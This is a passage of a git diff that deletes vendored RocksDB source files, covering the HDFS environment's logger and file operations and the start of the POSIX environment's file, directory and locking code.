-    if (hdfsCloseFile(fileSys_, hfile_) != 0) {
-      return IOError(filename_, errno);
-    }
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsWritableFile closed %s\n",
-                    filename_.c_str());
-    hfile_ = nullptr;
-    return Status::OK();
-  }
-};
-
-// The object that implements the debug logs to reside in HDFS.
-class HdfsLogger : public Logger {
- private:
-  HdfsWritableFile* file_;
-  uint64_t (*gettid_)();  // Return the thread id for the current thread
-
- public:
-  HdfsLogger(HdfsWritableFile* f, uint64_t (*gettid)())
-      : file_(f), gettid_(gettid) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsLogger opened %s\n",
-                    file_->getName().c_str());
-  }
-
-  virtual ~HdfsLogger() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsLogger closed %s\n",
-                    file_->getName().c_str());
-    delete file_;
-    if (mylog != nullptr && mylog == this) {
-      mylog = nullptr;
-    }
-  }
-
-  virtual void Logv(const char* format, va_list ap) {
-    const uint64_t thread_id = (*gettid_)();
-
-    // We try twice: the first time with a fixed-size stack allocated buffer,
-    // and the second time with a much larger dynamically allocated buffer.
-    char buffer[500];
-    for (int iter = 0; iter < 2; iter++) {
-      char* base;
-      int bufsize;
-      if (iter == 0) {
-        bufsize = sizeof(buffer);
-        base = buffer;
-      } else {
-        bufsize = 30000;
-        base = new char[bufsize];
-      }
-      char* p = base;
-      char* limit = base + bufsize;
-
-      struct timeval now_tv;
-      gettimeofday(&now_tv, nullptr);
-      const time_t seconds = now_tv.tv_sec;
-      struct tm t;
-      localtime_r(&seconds, &t);
-      p += snprintf(p, limit - p,
-                    "%04d/%02d/%02d-%02d:%02d:%02d.%06d %llx ",
-                    t.tm_year + 1900,
-                    t.tm_mon + 1,
-                    t.tm_mday,
-                    t.tm_hour,
-                    t.tm_min,
-                    t.tm_sec,
-                    static_cast<int>(now_tv.tv_usec),
-                    static_cast<long long unsigned int>(thread_id));
-
-      // Print the message
-      if (p < limit) {
-        va_list backup_ap;
-        va_copy(backup_ap, ap);
-        p += vsnprintf(p, limit - p, format, backup_ap);
-        va_end(backup_ap);
-      }
-
-      // Truncate to available space if necessary
-      if (p >= limit) {
-        if (iter == 0) {
-          continue;       // Try again with larger buffer
-        } else {
-          p = limit - 1;
-        }
-      }
-
-      // Add newline if necessary
-      if (p == base || p[-1] != '\n') {
-        *p++ = '\n';
-      }
-
-      assert(p <= limit);
-      file_->Append(base, p-base);
-      file_->Flush();
-      if (base != buffer) {
-        delete[] base;
-      }
-      break;
-    }
-  }
-};
-
-}  // namespace
-
-// Finally, the hdfs environment
-
-const std::string HdfsEnv::kProto = "hdfs://";
-const std::string HdfsEnv::pathsep = "/";
-
-// open a file for sequential reading
-Status HdfsEnv::NewSequentialFile(const std::string& fname,
-                                  unique_ptr<SequentialFile>* result,
-                                  const EnvOptions& options) {
-  result->reset();
-  HdfsReadableFile* f = new HdfsReadableFile(fileSys_, fname);
-  if (f == nullptr || !f->isValid()) {
-    delete f;
-    *result = nullptr;
-    return IOError(fname, errno);
-  }
-  result->reset(dynamic_cast<SequentialFile*>(f));
-  return Status::OK();
-}
-
-// open a file for random reading
-Status HdfsEnv::NewRandomAccessFile(const std::string& fname,
-                                    unique_ptr<RandomAccessFile>* result,
-                                    const EnvOptions& options) {
-  result->reset();
-  HdfsReadableFile* f = new HdfsReadableFile(fileSys_, fname);
-  if (f == nullptr || !f->isValid()) {
-    delete f;
-    *result = nullptr;
-    return IOError(fname, errno);
-  }
-  result->reset(dynamic_cast<RandomAccessFile*>(f));
-  return Status::OK();
-}
-
-// create a new file for writing
-Status HdfsEnv::NewWritableFile(const std::string& fname,
-                                unique_ptr<WritableFile>* result,
-                                const EnvOptions& options) {
-  result->reset();
-  Status s;
-  HdfsWritableFile* f = new HdfsWritableFile(fileSys_, fname);
-  if (f == nullptr || !f->isValid()) {
-    delete f;
-    *result = nullptr;
-    return IOError(fname, errno);
-  }
-  result->reset(dynamic_cast<WritableFile*>(f));
-  return Status::OK();
-}
-
-class HdfsDirectory : public Directory {
- public:
-  explicit HdfsDirectory(int fd) : fd_(fd) {}
-  ~HdfsDirectory() {}
-
-  virtual Status Fsync() { return Status::OK(); }
-
- private:
-  int fd_;
-};
-
-Status HdfsEnv::NewDirectory(const std::string& name,
-                             unique_ptr<Directory>* result) {
-  int value = hdfsExists(fileSys_, name.c_str());
-  switch (value) {
-    case HDFS_EXISTS:
-      result->reset(new HdfsDirectory(0));
-      return Status::OK();
-    default:  // fail if the directory doesn't exist
-      ROCKS_LOG_FATAL(mylog, "NewDirectory hdfsExists call failed");
-      throw HdfsFatalException("hdfsExists call failed with error " +
-                               ToString(value) + " on path " + name +
-                               ".\n");
-  }
-}
-
-Status HdfsEnv::FileExists(const std::string& fname) {
-  int value = hdfsExists(fileSys_, fname.c_str());
-  switch (value) {
-    case HDFS_EXISTS:
-      return Status::OK();
-    case HDFS_DOESNT_EXIST:
-      return Status::NotFound();
-    default:  // anything else should be an error
-      ROCKS_LOG_FATAL(mylog, "FileExists hdfsExists call failed");
-      return Status::IOError("hdfsExists call failed with error " +
-                             ToString(value) + " on path " + fname + ".\n");
-  }
-}
-
-Status HdfsEnv::GetChildren(const std::string& path,
-                            std::vector<std::string>* result) {
-  int value = hdfsExists(fileSys_, path.c_str());
-  switch (value) {
-    case HDFS_EXISTS: {  // directory exists
-    int numEntries = 0;
-    hdfsFileInfo* pHdfsFileInfo = 0;
-    pHdfsFileInfo = hdfsListDirectory(fileSys_, path.c_str(), &numEntries);
-    if (numEntries >= 0) {
-      for(int i = 0; i < numEntries; i++) {
-        char* pathname = pHdfsFileInfo[i].mName;
-        char* filename = std::rindex(pathname, '/');
-        if (filename != nullptr) {
-          result->push_back(filename+1);
-        }
-      }
-      if (pHdfsFileInfo != nullptr) {
-        hdfsFreeFileInfo(pHdfsFileInfo, numEntries);
-      }
-    } else {
-      // numEntries < 0 indicates error
-      ROCKS_LOG_FATAL(mylog, "hdfsListDirectory call failed with error ");
-      throw HdfsFatalException(
-          "hdfsListDirectory call failed negative error.\n");
-    }
-    break;
-  }
-  case HDFS_DOESNT_EXIST:  // directory does not exist, exit
-    return Status::NotFound();
-  default:          // anything else should be an error
-    ROCKS_LOG_FATAL(mylog, "GetChildren hdfsExists call failed");
-    throw HdfsFatalException("hdfsExists call failed with error " +
-                             ToString(value) + ".\n");
-  }
-  return Status::OK();
-}
-
-Status HdfsEnv::DeleteFile(const std::string& fname) {
-  if (hdfsDelete(fileSys_, fname.c_str(), 1) == 0) {
-    return Status::OK();
-  }
-  return IOError(fname, errno);
-};
-
-Status HdfsEnv::CreateDir(const std::string& name) {
-  if (hdfsCreateDirectory(fileSys_, name.c_str()) == 0) {
-    return Status::OK();
-  }
-  return IOError(name, errno);
-};
-
-Status HdfsEnv::CreateDirIfMissing(const std::string& name) {
-  const int value = hdfsExists(fileSys_, name.c_str());
-  //  Not atomic. state might change b/w hdfsExists and CreateDir.
-  switch (value) {
-    case HDFS_EXISTS:
-    return Status::OK();
-    case HDFS_DOESNT_EXIST:
-    return CreateDir(name);
-    default:  // anything else should be an error
-      ROCKS_LOG_FATAL(mylog, "CreateDirIfMissing hdfsExists call failed");
-      throw HdfsFatalException("hdfsExists call failed with error " +
-                               ToString(value) + ".\n");
-  }
-};
-
-Status HdfsEnv::DeleteDir(const std::string& name) {
-  return DeleteFile(name);
-};
-
-Status HdfsEnv::GetFileSize(const std::string& fname, uint64_t* size) {
-  *size = 0L;
-  hdfsFileInfo* pFileInfo = hdfsGetPathInfo(fileSys_, fname.c_str());
-  if (pFileInfo != nullptr) {
-    *size = pFileInfo->mSize;
-    hdfsFreeFileInfo(pFileInfo, 1);
-    return Status::OK();
-  }
-  return IOError(fname, errno);
-}
-
-Status HdfsEnv::GetFileModificationTime(const std::string& fname,
-                                        uint64_t* time) {
-  hdfsFileInfo* pFileInfo = hdfsGetPathInfo(fileSys_, fname.c_str());
-  if (pFileInfo != nullptr) {
-    *time = static_cast<uint64_t>(pFileInfo->mLastMod);
-    hdfsFreeFileInfo(pFileInfo, 1);
-    return Status::OK();
-  }
-  return IOError(fname, errno);
-
-}
-
-// The rename is not atomic. HDFS does not allow a renaming if the
-// target already exists. So, we delete the target before attempting the
-// rename.
-Status HdfsEnv::RenameFile(const std::string& src, const std::string& target) {
-  hdfsDelete(fileSys_, target.c_str(), 1);
-  if (hdfsRename(fileSys_, src.c_str(), target.c_str()) == 0) {
-    return Status::OK();
-  }
-  return IOError(src, errno);
-}
-
-Status HdfsEnv::LockFile(const std::string& fname, FileLock** lock) {
-  // there isn's a very good way to atomically check and create
-  // a file via libhdfs
-  *lock = nullptr;
-  return Status::OK();
-}
-
-Status HdfsEnv::UnlockFile(FileLock* lock) {
-  return Status::OK();
-}
-
-Status HdfsEnv::NewLogger(const std::string& fname,
-                          shared_ptr<Logger>* result) {
-  HdfsWritableFile* f = new HdfsWritableFile(fileSys_, fname);
-  if (f == nullptr || !f->isValid()) {
-    delete f;
-    *result = nullptr;
-    return IOError(fname, errno);
-  }
-  HdfsLogger* h = new HdfsLogger(f, &HdfsEnv::gettid);
-  result->reset(h);
-  if (mylog == nullptr) {
-    // mylog = h; // uncomment this for detailed logging
-  }
-  return Status::OK();
-}
-
-// The factory method for creating an HDFS Env
-Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) {
-  *hdfs_env = new HdfsEnv(fsname);
-  return Status::OK();
-}
-}  // namespace rocksdb
-
-#endif // ROCKSDB_HDFS_FILE_C
-
-#else // USE_HDFS
-
-// dummy placeholders used when HDFS is not available
-namespace rocksdb {
- Status HdfsEnv::NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) {
-   return Status::NotSupported("Not compiled with hdfs support");
- }
-
- Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) {
-   return Status::NotSupported("Not compiled with hdfs support");
- }
-}
-
-#endif
diff --git a/thirdparty/rocksdb/env/env_posix.cc b/thirdparty/rocksdb/env/env_posix.cc
deleted file mode 100644
index 5a671d7..0000000
--- a/thirdparty/rocksdb/env/env_posix.cc
+++ /dev/null
@@ -1,976 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors
-#include <dirent.h>
-#include <errno.h>
-#include <fcntl.h>
-#if defined(OS_LINUX)
-#include <linux/fs.h>
-#endif
-#include <pthread.h>
-#include <signal.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/ioctl.h>
-#include <sys/mman.h>
-#include <sys/stat.h>
-#ifdef OS_LINUX
-#include <sys/statfs.h>
-#include <sys/syscall.h>
-#endif
-#include <sys/time.h>
-#include <sys/types.h>
-#include <time.h>
-#include <algorithm>
-// Get nano time includes
-#if defined(OS_LINUX) || defined(OS_FREEBSD)
-#elif defined(__MACH__)
-#include <mach/clock.h>
-#include <mach/mach.h>
-#else
-#include <chrono>
-#endif
-#include <deque>
-#include <set>
-#include <vector>
-
-#include "env/io_posix.h"
-#include "env/posix_logger.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/thread_status_updater.h"
-#include "port/port.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/logging.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/thread_local.h"
-#include "util/threadpool_imp.h"
-
-#if !defined(TMPFS_MAGIC)
-#define TMPFS_MAGIC 0x01021994
-#endif
-#if !defined(XFS_SUPER_MAGIC)
-#define XFS_SUPER_MAGIC 0x58465342
-#endif
-#if !defined(EXT4_SUPER_MAGIC)
-#define EXT4_SUPER_MAGIC 0xEF53
-#endif
-
-namespace rocksdb {
-
-namespace {
-
-ThreadStatusUpdater* CreateThreadStatusUpdater() {
-  return new ThreadStatusUpdater();
-}
-
-// list of pathnames that are locked
-static std::set<std::string> lockedFiles;
-static port::Mutex mutex_lockedFiles;
-
-static int LockOrUnlock(const std::string& fname, int fd, bool lock) {
-  mutex_lockedFiles.Lock();
-  if (lock) {
-    // If it already exists in the lockedFiles set, then it is already locked,
-    // and fail this lock attempt. Otherwise, insert it into lockedFiles.
-    // This check is needed because fcntl() does not detect lock conflict
-    // if the fcntl is issued by the same thread that earlier acquired
-    // this lock.
-    if (lockedFiles.insert(fname).second == false) {
-      mutex_lockedFiles.Unlock();
-      errno = ENOLCK;
-      return -1;
-    }
-  } else {
-    // If we are unlocking, then verify that we had locked it earlier,
-    // it should already exist in lockedFiles. Remove it from lockedFiles.
-    if (lockedFiles.erase(fname) != 1) {
-      mutex_lockedFiles.Unlock();
-      errno = ENOLCK;
-      return -1;
-    }
-  }
-  errno = 0;
-  struct flock f;
-  memset(&f, 0, sizeof(f));
-  f.l_type = (lock ? F_WRLCK : F_UNLCK);
-  f.l_whence = SEEK_SET;
-  f.l_start = 0;
-  f.l_len = 0;        // Lock/unlock entire file
-  int value = fcntl(fd, F_SETLK, &f);
-  if (value == -1 && lock) {
-    // if there is an error in locking, then remove the pathname from lockedfiles
-    lockedFiles.erase(fname);
-  }
-  mutex_lockedFiles.Unlock();
-  return value;
-}
-
-class PosixFileLock : public FileLock {
- public:
-  int fd_;
-  std::string filename;
-};
-
-class PosixEnv : public Env {
- public:
-  PosixEnv();
-
-  virtual ~PosixEnv() {
-    for (const auto tid : threads_to_join_) {
-      pthread_join(tid, nullptr);
-    }
-    for (int pool_id = 0; pool_id < Env::Priority::TOTAL; ++pool_id) {
-      thread_pools_[pool_id].JoinAllThreads();
-    }
-    // Delete the thread_status_updater_ only when the current Env is not
-    // Env::Default().  This is to avoid the free-after-use error when
-    // Env::Default() is destructed while some other child threads are
-    // still trying to update thread status.
-    if (this != Env::Default()) {
-      delete thread_status_updater_;
-    }
-  }
-
-  void SetFD_CLOEXEC(int fd, const EnvOptions* options) {
-    if ((options == nullptr || options->set_fd_cloexec) && fd > 0) {
-      fcntl(fd, F_SETFD, fcntl(fd, F_GETFD) | FD_CLOEXEC);
-    }
-  }
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    int fd = -1;
-    int flags = O_RDONLY;
-    FILE* file = nullptr;
-
-    if (options.use_direct_reads && !options.use_mmap_reads) {
-#ifdef ROCKSDB_LITE
-      return Status::IOError(fname, "Direct I/O not supported in RocksDB lite");
-#endif  // !ROCKSDB_LITE
-#if !defined(OS_MACOSX) && !defined(OS_OPENBSD) && !defined(OS_SOLARIS)
-      flags |= O_DIRECT;
-#endif
-    }
-
-    do {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), flags, 0644);
-    } while (fd < 0 && errno == EINTR);
-    if (fd < 0) {
-      return IOError("While opening a file for sequentially reading", fname,
-                     errno);
-    }
-
-    SetFD_CLOEXEC(fd, &options);
-
-    if (options.use_direct_reads && !options.use_mmap_reads) {
-#ifdef OS_MACOSX
-      if (fcntl(fd, F_NOCACHE, 1) == -1) {
-        close(fd);
-        return IOError("While fcntl NoCache", fname, errno);
-      }
-#endif
-    } else {
-      do {
-        IOSTATS_TIMER_GUARD(open_nanos);
-        file = fdopen(fd, "r");
-      } while (file == nullptr && errno == EINTR);
-      if (file == nullptr) {
-        close(fd);
-        return IOError("While opening file for sequentially read", fname,
-                       errno);
-      }
-    }
-    result->reset(new PosixSequentialFile(fname, file, fd, options));
-    return Status::OK();
-  }
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    result->reset();
-    Status s;
-    int fd;
-    int flags = O_RDONLY;
-    if (options.use_direct_reads && !options.use_mmap_reads) {
-#ifdef ROCKSDB_LITE
-      return Status::IOError(fname, "Direct I/O not supported in RocksDB lite");
-#endif  // !ROCKSDB_LITE
-#if !defined(OS_MACOSX) && !defined(OS_OPENBSD) && !defined(OS_SOLARIS)
-      flags |= O_DIRECT;
-      TEST_SYNC_POINT_CALLBACK("NewRandomAccessFile:O_DIRECT", &flags);
-#endif
-    }
-
-    do {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), flags, 0644);
-    } while (fd < 0 && errno == EINTR);
-    if (fd < 0) {
-      return IOError("While open a file for random read", fname, errno);
-    }
-    SetFD_CLOEXEC(fd, &options);
-
-    if (options.use_mmap_reads && sizeof(void*) >= 8) {
-      // Use of mmap for random reads has been removed because it
-      // kills performance when storage is fast.
-      // Use mmap when virtual address-space is plentiful.
-      uint64_t size;
-      s = GetFileSize(fname, &size);
-      if (s.ok()) {
-        void* base = mmap(nullptr, size, PROT_READ, MAP_SHARED, fd, 0);
-        if (base != MAP_FAILED) {
-          result->reset(new PosixMmapReadableFile(fd, fname, base,
-                                                  size, options));
-        } else {
-          s = IOError("while mmap file for read", fname, errno);
-        }
-      }
-      close(fd);
-    } else {
-      if (options.use_direct_reads && !options.use_mmap_reads) {
-#ifdef OS_MACOSX
-        if (fcntl(fd, F_NOCACHE, 1) == -1) {
-          close(fd);
-          return IOError("while fcntl NoCache", fname, errno);
-        }
-#endif
-      }
-      result->reset(new PosixRandomAccessFile(fname, fd, options));
-    }
-    return s;
-  }
-
-  virtual Status OpenWritableFile(const std::string& fname,
-                                  unique_ptr<WritableFile>* result,
-                                  const EnvOptions& options,
-                                  bool reopen = false) {
-    result->reset();
-    Status s;
-    int fd = -1;
-    int flags = (reopen) ? (O_CREAT | O_APPEND) : (O_CREAT | O_TRUNC);
-    // Direct IO mode with O_DIRECT flag or F_NOCAHCE (MAC OSX)
-    if (options.use_direct_writes && !options.use_mmap_writes) {
-      // Note: we should avoid O_APPEND here due to ta the following bug:
-      // POSIX requires that opening a file with the O_APPEND flag should
-      // have no affect on the location at which pwrite() writes data.
-      // However, on Linux, if a file is opened with O_APPEND, pwrite()
-      // appends data to the end of the file, regardless of the value of
-      // offset.
-      // More info here: https://linux.die.net/man/2/pwrite
-#ifdef ROCKSDB_LITE
-      return Status::IOError(fname, "Direct I/O not supported in RocksDB lite");
-#endif  // ROCKSDB_LITE
-      flags |= O_WRONLY;
-#if !defined(OS_MACOSX) && !defined(OS_OPENBSD) && !defined(OS_SOLARIS)
-      flags |= O_DIRECT;
-#endif
-      TEST_SYNC_POINT_CALLBACK("NewWritableFile:O_DIRECT", &flags);
-    } else if (options.use_mmap_writes) {
-      // non-direct I/O
-      flags |= O_RDWR;
-    } else {
-      flags |= O_WRONLY;
-    }
-
-    do {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), flags, 0644);
-    } while (fd < 0 && errno == EINTR);
-
-    if (fd < 0) {
-      s = IOError("While open a file for appending", fname, errno);
-      return s;
-    }
-    SetFD_CLOEXEC(fd, &options);
-
-    if (options.use_mmap_writes) {
-      if (!checkedDiskForMmap_) {
-        // this will be executed once in the program's lifetime.
-        // do not use mmapWrite on non ext-3/xfs/tmpfs systems.
-        if (!SupportsFastAllocate(fname)) {
-          forceMmapOff_ = true;
-        }
-        checkedDiskForMmap_ = true;
-      }
-    }
-    if (options.use_mmap_writes && !forceMmapOff_) {
-      result->reset(new PosixMmapFile(fname, fd, page_size_, options));
-    } else if (options.use_direct_writes && !options.use_mmap_writes) {
-#ifdef OS_MACOSX
-      if (fcntl(fd, F_NOCACHE, 1) == -1) {
-        close(fd);
-        s = IOError("While fcntl NoCache an opened file for appending", fname,
-                    errno);
-        return s;
-      }
-#elif defined(OS_SOLARIS)
-      if (directio(fd, DIRECTIO_ON) == -1) {
-        if (errno != ENOTTY) { // ZFS filesystems don't support DIRECTIO_ON
-          close(fd);
-          s = IOError("While calling directio()", fname, errno);
-          return s;
-        }
-      }
-#endif
-      result->reset(new PosixWritableFile(fname, fd, options));
-    } else {
-      // disable mmap writes
-      EnvOptions no_mmap_writes_options = options;
-      no_mmap_writes_options.use_mmap_writes = false;
-      result->reset(new PosixWritableFile(fname, fd, no_mmap_writes_options));
-    }
-    return s;
-  }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    return OpenWritableFile(fname, result, options, false);
-  }
-
-  virtual Status ReopenWritableFile(const std::string& fname,
-                                    unique_ptr<WritableFile>* result,
-                                    const EnvOptions& options) override {
-    return OpenWritableFile(fname, result, options, true);
-  }
-
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    Status s;
-    int fd = -1;
-
-    int flags = 0;
-    // Direct IO mode with O_DIRECT flag or F_NOCAHCE (MAC OSX)
-    if (options.use_direct_writes && !options.use_mmap_writes) {
-#ifdef ROCKSDB_LITE
-      return Status::IOError(fname, "Direct I/O not supported in RocksDB lite");
-#endif  // !ROCKSDB_LITE
-      flags |= O_WRONLY;
-#if !defined(OS_MACOSX) && !defined(OS_OPENBSD) && !defined(OS_SOLARIS)
-      flags |= O_DIRECT;
-#endif
-      TEST_SYNC_POINT_CALLBACK("NewWritableFile:O_DIRECT", &flags);
-    } else if (options.use_mmap_writes) {
-      // mmap needs O_RDWR mode
-      flags |= O_RDWR;
-    } else {
-      flags |= O_WRONLY;
-    }
-
-    do {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(old_fname.c_str(), flags, 0644);
-    } while (fd < 0 && errno == EINTR);
-    if (fd < 0) {
-      s = IOError("while reopen file for write", fname, errno);
-      return s;
-    }
-
-    SetFD_CLOEXEC(fd, &options);
-    // rename into place
-    if (rename(old_fname.c_str(), fname.c_str()) != 0) {
-      s = IOError("while rename file to " + fname, old_fname, errno);
-      close(fd);
-      return s;
-    }
-
-    if (options.use_mmap_writes) {
-      if (!checkedDiskForMmap_) {
-        // this will be executed once in the program's lifetime.
-        // do not use mmapWrite on non ext-3/xfs/tmpfs systems.
-        if (!SupportsFastAllocate(fname)) {
-          forceMmapOff_ = true;
-        }
-        checkedDiskForMmap_ = true;
-      }
-    }
-    if (options.use_mmap_writes && !forceMmapOff_) {
-      result->reset(new PosixMmapFile(fname, fd, page_size_, options));
-    } else if (options.use_direct_writes && !options.use_mmap_writes) {
-#ifdef OS_MACOSX
-      if (fcntl(fd, F_NOCACHE, 1) == -1) {
-        close(fd);
-        s = IOError("while fcntl NoCache for reopened file for append", fname,
-                    errno);
-        return s;
-      }
-#elif defined(OS_SOLARIS)
-      if (directio(fd, DIRECTIO_ON) == -1) {
-        if (errno != ENOTTY) { // ZFS filesystems don't support DIRECTIO_ON
-          close(fd);
-          s = IOError("while calling directio()", fname, errno);
-          return s;
-        }
-      }
-#endif
-      result->reset(new PosixWritableFile(fname, fd, options));
-    } else {
-      // disable mmap writes
-      EnvOptions no_mmap_writes_options = options;
-      no_mmap_writes_options.use_mmap_writes = false;
-      result->reset(new PosixWritableFile(fname, fd, no_mmap_writes_options));
-    }
-    return s;
-
-    return s;
-  }
-
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) override {
-    int fd = -1;
-    while (fd < 0) {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), O_CREAT | O_RDWR, 0644);
-      if (fd < 0) {
-        // Error while opening the file
-        if (errno == EINTR) {
-          continue;
-        }
-        return IOError("While open file for random read/write", fname, errno);
-      }
-    }
-
-    SetFD_CLOEXEC(fd, &options);
-    result->reset(new PosixRandomRWFile(fname, fd, options));
-    return Status::OK();
-  }
-
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    result->reset();
-    int fd;
-    {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(name.c_str(), 0);
-    }
-    if (fd < 0) {
-      return IOError("While open directory", name, errno);
-    } else {
-      result->reset(new PosixDirectory(fd));
-    }
-    return Status::OK();
-  }
-
-  virtual Status FileExists(const std::string& fname) override {
-    int result = access(fname.c_str(), F_OK);
-
-    if (result == 0) {
-      return Status::OK();
-    }
-
-    switch (errno) {
-      case EACCES:
-      case ELOOP:
-      case ENAMETOOLONG:
-      case ENOENT:
-      case ENOTDIR:
-        return Status::NotFound();
-      default:
-        assert(result == EIO || result == ENOMEM);
-        return Status::IOError("Unexpected error(" + ToString(result) +
-                               ") accessing file `" + fname + "' ");
-    }
-  }
-
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override {
-    result->clear();
-    DIR* d = opendir(dir.c_str());
-    if (d == nullptr) {
-      switch (errno) {
-        case EACCES:
-        case ENOENT:
-        case ENOTDIR:
-          return Status::NotFound();
-        default:
-          return IOError("While opendir", dir, errno);
-      }
-    }
-    struct dirent* entry;
-    while ((entry = readdir(d)) != nullptr) {
-      result->push_back(entry->d_name);
-    }
-    closedir(d);
-    return Status::OK();
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    Status result;
-    if (unlink(fname.c_str()) != 0) {
-      result = IOError("while unlink() file", fname, errno);
-    }
-    return result;
-  };
-
-  virtual Status CreateDir(const std::string& name) override {
-    Status result;
-    if (mkdir(name.c_str(), 0755) != 0) {
-      result = IOError("While mkdir", name, errno);
-    }
-    return result;
-  };
-
-  virtual Status CreateDirIfMissing(const std::string& name) override {
-    Status result;
-    if (mkdir(name.c_str(), 0755) != 0) {
-      if (errno != EEXIST) {
-        result = IOError("While mkdir if missing", name, errno);
-      } else if (!DirExists(name)) { // Check that name is actually a
-                                     // directory.
-        // Message is taken from mkdir
-        result = Status::IOError("`"+name+"' exists but is not a directory");
-      }
-    }
-    return result;
-  };
-
-  virtual Status DeleteDir(const std::string& name) override {
-    Status result;
-    if (rmdir(name.c_str()) != 0) {
-      result = IOError("file rmdir", name, errno);
-    }
-    return result;
-  };
-
-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* size) override {
-    Status s;
-    struct stat sbuf;
-    if (stat(fname.c_str(), &sbuf) != 0) {
-      *size = 0;
-      s = IOError("while stat a file for size", fname, errno);
-    } else {
-      *size = sbuf.st_size;
-    }
-    return s;
-  }
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime) override {
-    struct stat s;
-    if (stat(fname.c_str(), &s) !=0) {
-      return IOError("while stat a file for modification time", fname, errno);
-    }
-    *file_mtime = static_cast<uint64_t>(s.st_mtime);
-    return Status::OK();
-  }
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& target) override {
-    Status result;
-    if (rename(src.c_str(), target.c_str()) != 0) {
-      result = IOError("While renaming a file to " + target, src, errno);
-    }
-    return result;
-  }
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& target) override {
-    Status result;
-    if (link(src.c_str(), target.c_str()) != 0) {
-      if (errno == EXDEV) {
-        return Status::NotSupported("No cross FS links allowed");
-      }
-      result = IOError("while link file to " + target, src, errno);
-    }
-    return result;
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock) override {
-    *lock = nullptr;
-    Status result;
-    int fd;
-    {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      fd = open(fname.c_str(), O_RDWR | O_CREAT, 0644);
-    }
-    if (fd < 0) {
-      result = IOError("while open a file for lock", fname, errno);
-    } else if (LockOrUnlock(fname, fd, true) == -1) {
-      result = IOError("While lock file", fname, errno);
-      close(fd);
-    } else {
-      SetFD_CLOEXEC(fd, nullptr);
-      PosixFileLock* my_lock = new PosixFileLock;
-      my_lock->fd_ = fd;
-      my_lock->filename = fname;
-      *lock = my_lock;
-    }
-    return result;
-  }
-
-  virtual Status UnlockFile(FileLock* lock) override {
-    PosixFileLock* my_lock = reinterpret_cast<PosixFileLock*>(lock);
-    Status result;
-    if (LockOrUnlock(my_lock->filename, my_lock->fd_, false) == -1) {
-      result = IOError("unlock", my_lock->filename, errno);
-    }
-    close(my_lock->fd_);
-    delete my_lock;
-    return result;
-  }
-
-  virtual void Schedule(void (*function)(void* arg1), void* arg,
-                        Priority pri = LOW, void* tag = nullptr,
-                        void (*unschedFunction)(void* arg) = 0) override;
-
-  virtual int UnSchedule(void* arg, Priority pri) override;
-
-  virtual void StartThread(void (*function)(void* arg), void* arg) override;
-
-  virtual void WaitForJoin() override;
-
-  virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const override;
-
-  virtual Status GetTestDirectory(std::string* result) override {
-    const char* env = getenv("TEST_TMPDIR");
-    if (env && env[0] != '\0') {
-      *result = env;
-    } else {
-      char buf[100];
-      snprintf(buf, sizeof(buf), "/tmp/rocksdbtest-%d", int(geteuid()));
-      *result = buf;
-    }
-    // Directory may already exist
-    CreateDir(*result);
-    return Status::OK();
-  }
-
-  virtual Status GetThreadList(
-      std::vector<ThreadStatus>* thread_list) override {
-    assert(thread_status_updater_);
-    return thread_status_updater_->GetThreadList(thread_list);
-  }
-
-  static uint64_t gettid(pthread_t tid) {
-    uint64_t thread_id = 0;
-    memcpy(&thread_id, &tid, std::min(sizeof(thread_id), sizeof(tid)));
-    return thread_id;
-  }
-
-  static uint64_t gettid() {
-    pthread_t tid = pthread_self();
-    return gettid(tid);
-  }
-
-  virtual uint64_t GetThreadID() const override {
-    return gettid(pthread_self());
-  }
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override {
-    FILE* f;
-    {
-      IOSTATS_TIMER_GUARD(open_nanos);
-      f = fopen(fname.c_str(), "w");
-    }
